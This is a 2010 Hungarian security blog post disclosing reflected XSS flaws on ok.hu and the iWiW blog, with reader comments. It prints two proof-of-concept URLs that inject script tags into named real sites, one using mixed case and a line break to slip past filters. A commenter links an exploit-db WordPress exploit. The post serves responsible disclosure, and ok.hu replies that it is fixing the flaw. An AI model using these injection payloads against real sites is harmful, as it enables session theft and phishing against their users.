Tweets by @buherablog
profile for buherator at IT Security Stack Exchange, Q&A for IT security professionals

A BitBetyár Blog

Túljártál a nagyokosok eszén? Küldd be a mutatványodat! (e-mail a buherator gmailkomra jöhet)

Full-Disclosure / Névjegy / Coming out

Promó

H.A.C.K.

Keresés

Címkék

0day (110) adobe (87) adobe reader (21) anonymous (26) apple (60) az olvasó ír (49) blackhat (20) botnet (22) bug (200) buherablog (44) buhera sörözés (39) bukta (49) deface (38) dns (22) dos (29) esemény (82) facebook (26) firefox (64) flash (33) gondolat (31) google (59) google chrome (36) hacktivity (37) hírek (117) incidens (224) internet explorer (88) iphone (35) java (50) jog (22) kína (21) kriptográfia (68) kultúra (21) linux (24) malware (43) microsoft (142) móka (48) mozilla (23) office (26) oracle (40) os x (43) patch (197) php (20) politika (31) privacy (58) programozás (22) safari (34) sql injection (62) windows (85) xss (77) Címkefelhő

Magyar blogok

Magyar oldalak

Külföldi oldalak

Kultúra

Feedek

XML

Archívum

hacker jelvény

Licensz

Creative Commons Licenc

OK.hu és iWiW XSS-ek

2010.04.13. 12:31 | buherator | 6 komment

Sokáig gondolkoztam, hogy kirakjam-e ezt a két, m1key által beküldött szösszenetet, de az Apache incidens meggyőzött, hogy egy-egy ilyen jelentéktelennek tűnő hibáról is érdemes szót ejteni, ha elég népszerű domainekről van szó.

http://www.ok.hu/katalogus?q=%3Cscript%3Ealert%28%27hacked%20by%20r00ts1t3.com%27%29%3C/script%3E&mode=1

http://ghblog.iwiw.hu/?s=1%3C/title%3E%3CScRiPt%20%0D%0A%3Ealert%28%27hacked%20by%20m1key%27%29%3B%3C/ScRiPt%3E

Nyilvánvalóan egyik esetben sem perzisztens a kódbeszúrás, de ahogy az ASF esetében is láthattuk, egy ilyen apró hiba is könnyen ütőképes fegyverré válhat egy eltökélt támadó kezében.

Facebook Tumblr Tweet Pinterest Tetszik
0

Címkék: iwiw xss ok.hu

Ajánlott bejegyzések:

Kommentek:

A hozzászólások a vonatkozó jogszabályok  értelmében felhasználói tartalomnak minősülnek, értük a szolgáltatás technikai  üzemeltetője semmilyen felelősséget nem vállal, azokat nem ellenőrzi. Kifogás esetén forduljon a blog szerkesztőjéhez. Részletek a  Felhasználási feltételekben és az adatvédelmi tájékoztatóban.

lightgod 2010.04.13. 13:20:08

Az OK weboldala 1 eve is ilyen volt... Irtam is nekik asszem 2x is levelet, de ****tak ram... (elnezest az iletlen csillagos szavakert)... a gephazas meg... Valahogy... Nem lepodtem meg... Valahogy lassan minden honapra jut egy iwiw-es hiba...

/* De a kedvencem, amikor az iwiw-en asszem talan a profiloldallal kapcsolatban volt js kodfuttatasi lehetoseg... es en is szepen megkatam emailben, hogy valaki levlet kuldott nekem es nezzem meg kiaz, mert biztos hianyzok neki... Teljesen jo volt a level azzal a hibaval, hogy nincs IWIW accountom... */
Válasz erre 

ok_hu 2010.04.14. 13:18:25

buherator: kösz! a jelzést, minden hiba fontos, javítjuk.

lightgod: bocs, hogy akkor nem válaszoltunk, valahol belül elakadt a mail
Válasz erre 

buherator · http://buhera.blog.hu 2010.04.14. 14:04:08

@ok_hu: örülök ha segíthetek, köszönöm a visszajelzést!
Válasz erre 

HaxorBenő 2010.04.14. 14:12:51

És remélem tudjátok mi az igazi FAIL : d
Megnézed ghblog.iwiw.hu forrásába a verzió számot ami "WordPress 2.6.1"
És hogy van fent exploit-db -n hozzá exploit..
www.exploit-db.com/exploits/6397
Válasz erre 

lurk (törölt) 2010.04.14. 20:51:36

"És hogy van fent exploit-db -n hozzá exploit.."

Egy baj van ezzel az "exploit"-tal:

"admin's password changed, but new password will be send to correct admin email"
Válasz erre 

_2501 2010.04.15. 10:13:49

@HaxorBenő: Meg se nézted azt a splojtot, csak osztanád az észt. Te vagy az igazi FAIL...
Válasz erre 
süti beállítások módosítása